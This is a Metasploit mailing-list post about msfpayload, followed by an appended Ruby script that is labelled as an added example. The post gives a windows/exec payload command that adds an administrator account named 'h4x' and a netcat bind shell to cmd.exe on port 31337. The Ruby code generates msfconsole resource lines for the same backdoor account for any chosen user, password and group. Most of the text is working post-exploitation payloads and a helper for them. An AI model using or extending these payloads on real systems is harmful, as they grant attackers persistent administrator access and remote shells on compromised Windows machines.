Metasploit mailing list archives

Bugs in msfpayload


From: patrick at aushack.com (Patrick Webster)
Date: Wed, 5 Sep 2007 17:23:52 +1000

For Q3,

you could just use:

set PAYLOAD windows/exec
set CMD "net user h4x passw0rd /add && net localgroup Administrators h4x /add"
(should work but untested)

and swap the Administrators group with whatever you want.

But for your exploit, why not just compile an exe that calls netcat and
binds to cmd.exe?

system("nc.exe -L -p 31337 -e cmd.exe")

and so on.

Oh and check out http://www.metasploit.com/archive/framework/msg02376.html -
the payload probably requires use of some registers.

-Patrick
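The windows/exec suggestion above works as a one-liner only as long as the account name, password and group name do not contain anything cmd.exe or `net user` would misinterpret. The following Ruby is an added example (not from the post or from Metasploit itself) that builds the CMD value for an arbitrary user/password/group, quotes group names that contain spaces, and refuses inputs that would break the `&&` chain. The function and constant names are the example's own; the `\"` escaping in `msf_set_cmd_line` assumes msfconsole tokenizes a `set` line with Shellwords-style rules.

```ruby
# Added example, not from the original post or from Metasploit: compose the
# CMD string for the windows/exec payload that creates a local user and adds
# it to a group, rejecting inputs that would silently break the one-liner.
# All function and constant names here are this example's own.

# Characters cmd.exe treats specially: any of them inside a password or name
# would truncate, redirect or split the "net user ... && net localgroup ..." chain.
CMD_METACHARS = /[&|<>^%"()]/

# Characters Windows rejects in a SAM account (user or group) name.
BAD_NAME_CHARS = /["\/\\\[\]:;|=,+*?<>]/
MAX_USER_LEN  = 20   # SAM account name limit for users
MAX_GROUP_LEN = 256  # local group names may be longer

def validate_account_name(name, what, max_len)
  raise ArgumentError, "#{what} must be 1-#{max_len} characters" if name.empty? || name.length > max_len
  raise ArgumentError, "#{what} contains a character Windows rejects: #{name[BAD_NAME_CHARS]}" if name =~ BAD_NAME_CHARS
  raise ArgumentError, "#{what} cannot consist only of dots and spaces" if name.delete('. ').empty?
  raise ArgumentError, "#{what} contains a cmd.exe metacharacter: #{name[CMD_METACHARS]}" if name =~ CMD_METACHARS
  name
end

def validate_password(pw)
  raise ArgumentError, 'password is empty' if pw.empty?
  raise ArgumentError, 'password contains whitespace; net user would split it' if pw =~ /\s/
  raise ArgumentError, "password contains a cmd.exe metacharacter: #{pw[CMD_METACHARS]}" if pw =~ CMD_METACHARS
  pw
end

# Quote a token for cmd.exe only when it needs it, e.g. "Remote Desktop Users".
def cmd_token(s)
  s.include?(' ') ? %("#{s}") : s
end

def build_add_user_cmd(user, pass, group = 'Administrators')
  validate_account_name(user, 'user name', MAX_USER_LEN)
  validate_account_name(group, 'group name', MAX_GROUP_LEN)
  validate_password(pass)
  # && makes the group add run only if the account was actually created
  "net user #{user} #{pass} /add && net localgroup #{cmd_token(group)} #{user} /add"
end

# Assumption: msfconsole splits a `set` line Shellwords-style, so the value is
# wrapped in double quotes and any inner double quote is backslash-escaped.
def msf_set_cmd_line(cmd)
  %(set CMD "#{cmd.gsub('"') { '\\"' }}")
end

def resource_script(user, pass, group = 'Administrators')
  ['set PAYLOAD windows/exec', msf_set_cmd_line(build_add_user_cmd(user, pass, group))].join("\n")
end

if __FILE__ == $0
  puts resource_script('h4x', 'passw0rd')
  puts resource_script('h4x', 'passw0rd', 'Remote Desktop Users')
  begin
    build_add_user_cmd('h4x', 'pass&word')
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
end
```

Run it as `ruby build_cmd.rb` to print the two `set` lines for an msfconsole resource file; a password such as `pass&word` is rejected rather than emitted, because `&` would end the `net user` command early and run the rest as a separate command.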